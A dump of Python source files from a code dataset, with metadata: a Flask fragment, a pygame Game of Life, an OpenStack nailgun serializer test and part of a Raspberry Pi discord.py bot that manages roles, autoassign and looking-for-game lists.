parse_put_data(existing_all_department_data=required_department_data,\n # name=department_name)\n\n return response\n", "sub_path": "flask-demo/tgi-flask.py", "file_name": "tgi-flask.py", "file_ext": "py", "file_size_in_byte": 4117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "wtforms.Form", "line_number": 32, "usage_type": "name"}, {"api_name": "wtforms.TextField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.required", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 33, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 124, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 124, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 129, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "149935534", "text": "import pygame\nimport numpy as np\nimport random as r \nimport os \n\n# Colors used to draw the buttons \ngrey = (210, 210, 210) # the grid lines \nblack = (0, 0, 0) # alive cells \nwhite = (255, 255, 255) # dead cells \ngreen = (0, 200, 0) # start button \nred = (200, 0, 0) # pause button\nblue = (30, 144, 255) # reset button\nbright_green = (0, 255, 0) # to make the buttons light up \nbright_red = (255, 0, 0)\nbright_blue = (0, 191, 255)\n\n# The game window\nwindow_width = 716\nwindow_height = 785 \n\n# A matrix to store on/off values \nN = 65\ngrid = np.zeros((N, N)) \n\n# The cell dimensions \ncell_width = 10\ncell_height = 10\nmargin = 1 # the margin between the cells\n\nclass Life:\n \"\"\" \n A class for the cellular automaton Game of Life. It has \n two properties that determine whether the game is running\n and whether Conway's rules are being iterated.\n \n Properties\n ''''''''''\n running: logical\n If True, the game is run. The default is False. Is True \n when the main function play() is called. \n iterate: logical \n If True, the rules are applied to the grid and the Game of Life\n evolves over generations. The default is False. 
Is on when the user \n clicks on the START button. Is False when the user clicks on the PAUSE \n or the RESET button.\n \"\"\"\n def __init__(self):\n \"\"\" \n Constructor for the Life class. Takes no arguments. \n \"\"\"\n self.running = False \n self.iterate = False\n \n def play(self, pattern = r.randrange(1, 5, 1)):\n \"\"\" \n The main function of the game. Initiates the game by creating \n a screen with a constant window size. Draws the buttons and runs \n the event loop while responding to the buttons pressed. \n \n Parameters \n \n pattern \n Determines the initial pattern that appears on the \n screen when the game is started. It can take values between \n 1 and 4. The correspondence between the arguments and the patterns: \n \n 1 = glider \n 2 = R-pentomino \n 3 = light-weighted space ship \n 4 = pentadecathlon\n \n The default value is a randomly drawn integer. \n \"\"\"\n pygame.init() \n self.running = True # runs the while loop \n screen = pygame.display.set_mode((window_width, window_height))\n pygame.display.set_caption(\"Game of Life\")\n self.initial(pattern) # sets the initial pattern when the window opens\n while self.running == True:\n self.update()\n self.draw(screen)\n # always track the mouse position\n mouse = pygame.mouse.get_pos() \n click = pygame.mouse.get_pressed()\n # change the screen coordinates to grid coordinates\n global i # if these are not declared globally \n global j # the state function does not work \n i = mouse[1] // (cell_height + margin) # row number\n j = mouse[0] // (cell_width + margin) # column number \n for event in pygame.event.get(): \n if event.type == pygame.QUIT: # stop the loop if the user closes the window \n running = False\n pygame.quit()\n os._exit(0)\n elif click[0] == 1: # if the mouse is clicked \n # change the cell state if the mouse is on the grid \n if 0 <= i <= (N - 1): \n self.state()\n # start iterating if the start button is pressed \n elif 140 < mouse[0] < 140 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = True \n # stop iterating if the pause button is pressed \n elif 305 < mouse[0] < 305 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = False\n # stop and reset if the reset button is pressed \n elif 466 < mouse[0] < 466 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = False\n self.reset()\n \n # Draw the buttons, bright if the mouse is on the button \n if 140 < mouse[0] < 140 + 100 and 725 < mouse[1] < 725 + 50:\n pygame.draw.rect(screen, bright_green, (140, 725, 100, 50))\n else: \n pygame.draw.rect(screen, green, (140, 725, 100, 50))\n\n if 305 < mouse[0] < 305 + 100 and 725 < mouse [1] < 725 + 50:\n pygame.draw.rect(screen, bright_red, (305, 725, 100, 50))\n else:\n pygame.draw.rect(screen, red, (305, 725, 100, 50))\n\n if 466 < mouse[0] < 466 + 100 and 725 < mouse [1] < 725 + 50:\n pygame.draw.rect(screen, bright_blue, (466, 725, 100, 50))\n else:\n pygame.draw.rect(screen, blue, (466, 725, 100, 50))\n \n text = pygame.font.Font(\"freesansbold.ttf\", 20)\n textSurf_1, textRect_1 = self.text_objects(\"START\", text)\n textSurf_2, textRect_2 = self.text_objects(\"PAUSE\", text)\n textSurf_3, textRect_3 = self.text_objects(\"RESET\", text)\n textRect_1.center = ((140 + (100 / 2)), (725 + (50 / 2)))\n textRect_2.center = ((305 + (100 / 2)), (725 + (50 / 2)))\n textRect_3.center = ((466 + (100 / 2)), (725 + (50 / 2)))\n screen.blit(textSurf_1, textRect_1)\n screen.blit(textSurf_2, textRect_2)\n screen.blit(textSurf_3, textRect_3)\n # update the screen\n pygame.display.update()\n \n def rules(self):\n 
\"\"\" \n Applies Conway's rules to the matrix of cells\n and updates the matrix over generations. \n \"\"\"\n X = grid.copy()\n for i in range(N):\n for j in range(N):\n # calculating the activation of a cell's 8 neighbors\n total_activation = int(\n (X[i, (j - 1) % N] + \n X[i, (j + 1) % N] + \n X[(i - 1) % N, j] + \n X[(i + 1) % N, j] +\n X[(i - 1) % N, (j - 1) % N] + \n X[(i - 1) % N, (j + 1) % N] + \n X[(i + 1) % N, (j - 1) % N] + \n X[(i + 1) % N, (j + 1) % N])\n )\n # implementing Conway's 4 rules\n if X[i, j] == 0:\n if total_activation == 3: # birth \n grid[i, j] = 1\n else: \n grid[i, j] = 0 # loneliness \n elif X[i, j] == 1:\n if (total_activation < 2) or (total_activation > 3): # loneliness & overcrowding \n grid[i, j] = 0\n else:\n grid[i, j] = 1 # survival\n return grid\n \n def initial(self, pattern): \n \"\"\" \n Turns cells alive according to the pattern argument.\n Returns the grid with the chosen initial pattern. The \n location of the pattern is chosen randomly by sampling \n from grid coordinates. The coordinates of the edges are \n excluded to make sure the pattern is fully visible. \n \n 1 = glider \n 2 = R-pentomino \n 3 = light-weighted space ship \n 4 = pentadecathlon\n \n Parameters \n \n pattern \n Specified in the main function play(). \n The default is a random draw between 1 and 4. \n \"\"\"\n index = r.randrange(10, 50, 1) # randomly pick a location \n if pattern == 1: # glider \n grid[index, index] = 1\n grid[index, index + 1] = 1\n grid[index, index + 2] = 1\n grid[index - 1, index + 2] = 1\n grid[index - 2, index + 1] = 1\n elif pattern == 2: # R-pentomino \n grid[index, index] = 1\n grid[index + 1, index] = 1\n grid[index + 2, index] = 1\n grid[index + 1, index - 1] = 1\n grid[index, index + 1] = 1\n elif pattern == 3: # light-weight space ship\n grid[index, index] = 1\n grid[index, index + 1] = 1\n grid[index, index + 2] = 1\n grid[index, index + 3] = 1\n grid[index - 1, index] = 1\n grid[index - 2, index] = 1\n grid[index - 3, index + 1] = 1\n grid[index - 3, index + 4] = 1\n grid[index - 1, index + 4] = 1\n elif pattern == 4: # pentadecathlon\n l = list(range(index, index + 10))\n grid[index, [x for i, x in enumerate(l) if (i != 2 and i != 7)]] = 1\n grid[index + 1, [index + 2, index + 7]] = 1\n grid[index - 1, [index + 2, index + 7]] = 1\n return grid\n \n def update(self):\n \"\"\" \n This function applies Conway's rules to the current pattern if\n the logical attribute iterate is True. iterate is True if the user \n has pressed the start button. \n \"\"\"\n if self.iterate:\n self.rules()\n \n def draw(self, screen):\n \"\"\" \n Draws the grid based on the matrix values. \n If the matrix value is 1, the cell is drawn black. \n If the matrix value is 0, the cell is drawn white. \n \"\"\"\n screen.fill(grey)\n for i in range(N):\n for j in range(N):\n if grid[i, j] == 0:\n color = white\n elif grid[i][j] == 1:\n color = black\n rect = pygame.draw.rect(screen, color, ((cell_width + margin) * j + margin, # x-coordinates of top-left corner \n (cell_height + margin) * i + margin, # y-coordinates of top-left corner\n cell_width, cell_height)) \n return rect \n \n def state(self):\n \"\"\" \n Uses mouse clicks to turn dead \n cells live and kill live cells. \n \"\"\"\n if grid[i][j] == 0:\n grid[i][j] = 1\n elif grid[i][j] == 1:\n grid[i][j] = 0\n return grid \n \n def reset(self):\n \"\"\" \n Stops iterating the rules \n and kills all the cells. \n Returns an empty grid. 
\n \"\"\"\n for i in range(N):\n for j in range(N):\n grid[i, j] = 0\n return grid \n \n def text_objects(self, text, font):\n \"\"\" \n Creates a text surface which is later added \n to the START, PAUSE and RESET buttons. \n \"\"\"\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()", "sub_path": "conway/utilities.py", "file_name": "utilities.py", "file_ext": "py", "file_size_in_byte": 10884, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.init", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 77, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pressed", "line_number": 84, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 90, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 93, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 112, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 124, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 126, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 137, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 137, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 190, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 242, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 242, "usage_type": "attribute"}]} +{"seq_id": "52184116", "text": "# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom mock import patch\n\nfrom nailgun.test import base\n\nfrom nailgun.orchestrator import deployment_serializers\n\n\nCREDS = {'tenant': {'value': 'NONDEFAULT'}}\n\n\nclass TestNeutronDeploymentSerializer(base.BaseTestCase):\n\n def setUp(self):\n super(TestNeutronDeploymentSerializer, self).setUp()\n self.env.create(cluster_kwargs={'net_provider': 'neutron'})\n self.cluster = self.env.clusters[0]\n self.serializer = (deployment_serializers.\n NeutronNetworkDeploymentSerializer)\n\n def verify_network_tenant(self, network):\n self.assertEqual(network['tenant'], CREDS['tenant']['value'])\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_internal_network_changes_tenant_name(self, creds):\n int_network = self.serializer._generate_internal_network(self.cluster)\n self.verify_network_tenant(int_network)\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_external_network_changes_tenant_name(self, creds):\n ext_network = self.serializer._generate_external_network(self.cluster)\n self.verify_network_tenant(ext_network)\n\n @patch(('nailgun.orchestrator.deployment_serializers.objects.'\n 'Cluster.get_creds'), return_value=CREDS)\n def test_predefined_networks_tenant_name(self, creds):\n predefined_network = self.serializer.generate_predefined_networks(\n self.cluster)\n self.verify_network_tenant(predefined_network['net04'])\n self.verify_network_tenant(predefined_network['net04_ext'])\n", "sub_path": "nailgun/nailgun/test/unit/test_deployment_network_serializer.py", "file_name": "test_deployment_network_serializer.py", "file_ext": "py", "file_size_in_byte": 2293, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nailgun.test.base.BaseTestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "nailgun.test.base", "line_number": 25, "usage_type": "name"}, {"api_name": "nailgun.orchestrator.deployment_serializers.NeutronNetworkDeploymentSerializer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nailgun.orchestrator.deployment_serializers", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 37, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 43, "usage_type": "call"}, {"api_name": "mock.patch", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "398380040", "text": "import discord\nfrom discord.ext import commands\nimport random\nimport os.path\nimport socket\nimport sys\nfrom forex_python.bitcoin import BtcConverter\n\n\n\nTOKEN = 'BOT TOKEN HERE'\n\nbot = commands.Bot(command_prefix = '!')\n\n\n\n@bot.event\nasync def on_ready():\n print('Logged in as\\n' + bot.user.name + '\\n' + bot.user.id + '\\n' + 'Python: {}'.format(sys.version) + '\\n------')\n\n with open('status.txt', 'r') as f_o:\n await bot.change_presence(game=discord.Game(name=f_o.readline()), status=None, afk=False)\n\n\n\n@bot.event\nasync def on_server_role_delete(role):\n if os.path.isfile('/home/pi/pi_bot/roles/' + 
role.server.id + '.txt'):\n with open('/home/pi/pi_bot/roles/' + role.server.id + '.txt', 'r') as f_o:\n rolefile = f_o.readline()\n if role.id in rolefile:\n rolefile = rolefile.replace(role.id + 'x', '', 1)\n if rolefile == '':\n os.remove('/home/pi/pi_bot/roles/' + role.server.id + '.txt')\n else:\n with open('/home/pi/pi_bot/roles/' + role.server.id + '.txt', 'w') as f_o:\n f_o.write(rolefile)\n\n\n\n@bot.event\nasync def on_member_join(member):\n if os.path.isfile('/home/pi/pi_bot/autoassign/' + member.server.id + '.txt'):\n for item in member.server.roles:\n with open('/home/pi/pi_bot/autoassign/' + member.server.id + '.txt', 'r') as f_o:\n if item.id in f_o.readline():\n await bot.add_roles(member, item)\n\n\n\n@bot.event\nasync def on_message(message):\n \n \n \n #Commands\n if not message.author.id == '375343366126436355' and message.content.startswith('!'):\n \n \n \n #Bool checks\n purgecheck = 'placeholder'\n \n \n \n #Help Commands\n if message.content.startswith ('!help'):\n embed = discord.Embed(title='Help', description='Subcommands for help on categories.')\n embed.add_field(name='!help', value='Shows this message.', inline=True)\n embed.add_field(name='!rolehelp', value='Role System Commands', inline=True)\n embed.add_field(name='!adminhelp', value='Admin-only commands.', inline=True)\n embed.add_field(name='!mischelp', value='Miscellaneous Commands.', inline=True)\n embed.add_field(name='Twitter Updates:', value='https://twitter.com/discord_pi_bot')\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!rolehelp'):\n embed = discord.Embed(title='!role Subcommands', description='A list of roles members can choose between.')\n embed.add_field(name='!role', value='Subcommands:\\nview - Sends the list\\nset - Gives you the role you specify in the list (NOT @mention).\\nAdmin-only Subcommands:\\nadd - Adds the @mentioned role to the list.\\nremove - Removes the @mentioned role from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!adminhelp'):\n embed = discord.Embed(title='Admin-Only Commands', description='Only members with the Administrator permission can use these commands.')\n embed.add_field(name='!purge', value='Mass deletes messages. Ex: !purge 20', inline=False)\n embed.add_field(name='!addroles', value='Adds roles you specify to a list of roles, members can assign themselves one of them with !setrole. 
Ex: !addroles @role1 @role2', inline=False)\n embed.add_field(name='!autoassign', value='Adds a role to be automatically assigned to a user when they join.\\nSubcommands:\\nview - Shows the autoassign list.\\nadd - adds the @mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!mischelp'):\n embed = discord.Embed(title='Miscellaneous Commands', description='Commands that don\\'t fall under any !help category')\n embed.add_field(name='!lfg', value='Adds or removes you from the \"Looking for game\" list in that channel.', inline=False)\n embed.add_field(name='!lfg list', value='Shows the \"Looking for game\" list in that channel.', inline=False)\n embed.add_field(name='!btc', value='Sends the Bitcoin Exchange rate.', inline=False)\n embed.add_field(name='!pfp', value='Gets the profile picture of the @mentioned user.', inline=False)\n embed.set_footer(text='Use !help, !rolehelp, !adminhelp, or !mischelp for other commands.')\n await bot.send_message(message.channel, embed=embed)\n \n \n \n \n if not message.channel.is_private:\n \n \n \n #Dev Commands\n if message.author.id == 'YOUR ID HERE':\n if message.content.startswith('!setstatus'):\n status = message.content[11:len(message.content)]\n with open('status.txt', 'w') as f_o:\n f_o.write(status)\n await bot.change_presence(game=discord.Game(name=status), status=None, afk=False)\n await bot.send_message(message.channel, message.author.mention + ' changed status to ' + status)\n elif message.content.startswith('!say'):\n await bot.send_message(message.channel, message.content.replace('!say ', '', 1))\n elif message.content.startswith('!send'):\n channel = message.content[0:24].replace('!send ', '', 1)\n await bot.send_message(bot.get_channel(channel), message.content[25:len(message.content)])\n elif message.content.startswith('!servers'):\n msg = ''\n for item in bot.servers:\n msg = msg + item.name + ' ' + str(len(item.members)) + '\\n'\n await bot.send_message(message.channel, msg)\n elif message.content.startswith('!announcement'):\n for server in bot.servers:\n for channel in server.channels:\n if channel.type == discord.ChannelType.text:\n if channel.permissions_for(server.me).send_messages:\n if channel.name == 'general':\n embed=discord.Embed(title='Message From Developer ' + message.author.name, description=message.content.replace('!announcement ', '', 1))\n await bot.send_message(channel, embed=embed)\n break\n \n \n \n #Administrator-Only Commands\n if message.author.server_permissions.administrator or message.author.id == '268138118270418954':\n if message.content.startswith('!purge'):\n if int(message.content[7:10]) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Cannot delete 0 messages.')\n else:\n purgecheck = 'a'\n await bot.delete_message(message)\n deleted = await bot.purge_from(message.channel, limit=int(message.content[7:10]), check=None)\n await bot.send_message(message.channel, message.author.mention + ' Successfully deleted {} message(s).'.format(len(deleted)))\n elif message.content.startswith('!autoassign'):\n if message.content[12:16] == 'view':\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is empty.')\n else:\n 
with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[12:17] == 'clear':\n if os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n os.remove('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared autoassign list.')\n else:\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is already empty.')\n elif message.content[12:15] == 'add':\n if len(message.role_mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the role(s) to add.')\n else:\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write('')\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n for item in message.role_mentions:\n fileline = fileline + item.id + 'x'\n f_o.write(fileline)\n addedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n addedroles = addedroles + item.name + ' '\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.add_field(name='Added Roles:', value=addedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[12:18] == 'remove':\n if not os.path.isfile('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The autoassign list is empty.')\n else:\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n removedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n fileline = fileline.replace(item.id + 'x', '', 1)\n removedroles = removedroles + item.name + ' '\n if fileline == '':\n os.remove('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared autoassign list.')\n else:\n if removedroles == '':\n await bot.send_message(message.channel, message.author.mention + ' Mentioned roles aren\\'t in the list.')\n else:\n with open('/home/pi/pi_bot/autoassign/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write(fileline)\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Autoassign List:', description=rolelist)\n embed.add_field(name='Removed Roles:', value=removedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n else:\n embed = discord.Embed(title='Not a valid subcommand')\n embed.add_field(name='!autoassign (Subcommand)', value='view - Shows the autoassign list.\\nadd - adds the 
@mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n \n \n \n \n #Role Commands\n if message.content.startswith('!role') and not message.content.startswith('!rolehelp'):\n if message.content[6:10] == 'view':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[6:9] == 'set':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n rolelist = await bot.get_server_roles(message.server)\n removerole = ''\n real = False\n for role in rolelist:\n if role in message.author.roles:\n removerole = role\n if role.name == message.content.replace('!role set ', '', 1):\n setrole = role\n real = True\n if real == False:\n await bot.send_message(message.channel, message.author.mention + ' That role doesn\\'t exist, use !rolehelp for help.')\n else:\n embed = discord.Embed(title='Set role to:', description=setrole.name)\n if not removerole == '':\n await bot.remove_roles(message.author, removerole)\n embed.add_field(name='Removed role:', value=removerole.name, inline=True)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.add_roles(message.author, setrole)\n await bot.send_message(message.channel, embed=embed)\n elif message.author.server_permissions.administrator or message.author.id == '268138118270418954':\n if message.content[6:11] == 'clear':\n if os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n os.remove('/home/pi/pi_bot/roles/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared role list.')\n else:\n await bot.send_message(message.channel, message.author.mention + ' The role list is already empty.')\n elif message.content[6:9] == 'add':\n if len(message.role_mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the role(s) to add.')\n else:\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write('')\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n for item in message.role_mentions:\n fileline = fileline + item.id + 'x'\n f_o.write(fileline)\n addedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n addedroles = addedroles + item.name + ' '\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.add_field(name='Added Roles:', value=addedroles, inline=False)\n 
embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content[6:12] == 'remove':\n if not os.path.isfile('/home/pi/pi_bot/roles/' + message.server.id + '.txt'):\n await bot.send_message(message.channel, message.author.mention + ' The role list is empty.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n removedroles = ''\n for item in message.role_mentions:\n if item.id in fileline:\n fileline = fileline.replace(item.id + 'x', '', 1)\n removedroles = removedroles + item.name + ' '\n if fileline == '':\n os.remove('/home/pi/pi_bot/roles/' + message.server.id + '.txt')\n await bot.send_message(message.channel, message.author.mention + ' Cleared role list.')\n else:\n if removedroles == '':\n await bot.send_message(message.channel, message.author.mention + ' Mentioned roles aren\\'t in the list.')\n else:\n with open('/home/pi/pi_bot/roles/' + message.server.id + '.txt', 'w') as f_o:\n f_o.write(fileline)\n rolelist = ''\n for item in message.server.roles:\n if item.id in fileline:\n rolelist = rolelist + item.name + '\\n'\n embed = discord.Embed(title='Role List:', description=rolelist)\n embed.add_field(name='Removed Roles:', value=removedroles, inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n else:\n embed = discord.Embed(title='Not a valid subcommand')\n embed.add_field(name='!role (Subcommand)', value='view - Shows the role list.\\nadd - adds the @mentioned roles to the list.\\nremove - removes the @mentioned roles from the list.\\nclear - Clears the list.', inline=False)\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n \n \n \n #Misc. 
Commands\n if message.content.startswith('!lfg'):\n if message.content[5:9] == 'list':\n if not os.path.isfile('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt'):\n embed=discord.Embed(title='There is currently no one looking for a game')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'r') as f_o:\n file = f_o.readline()\n msg = ''\n for member in message.server.members:\n if member.id in file:\n msg = msg + member.name + '\\n'\n embed=discord.Embed(title='User(s) looking for a game:', description=msg)\n else:\n if not os.path.isfile('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt'):\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(message.author.id + 'x')\n embed=discord.Embed(title='You are now looking for game')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'r') as f_o:\n file = f_o.readline()\n if message.author.id in file:\n file = file.replace(message.author.id + 'x', '', 1)\n if file == '':\n await bot.send_message(message.channel, 'here')\n os.remove('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt')\n else:\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(file)\n embed=discord.Embed(title='You are no longer looking for a game')\n else:\n file = file + message.author.id + 'x'\n 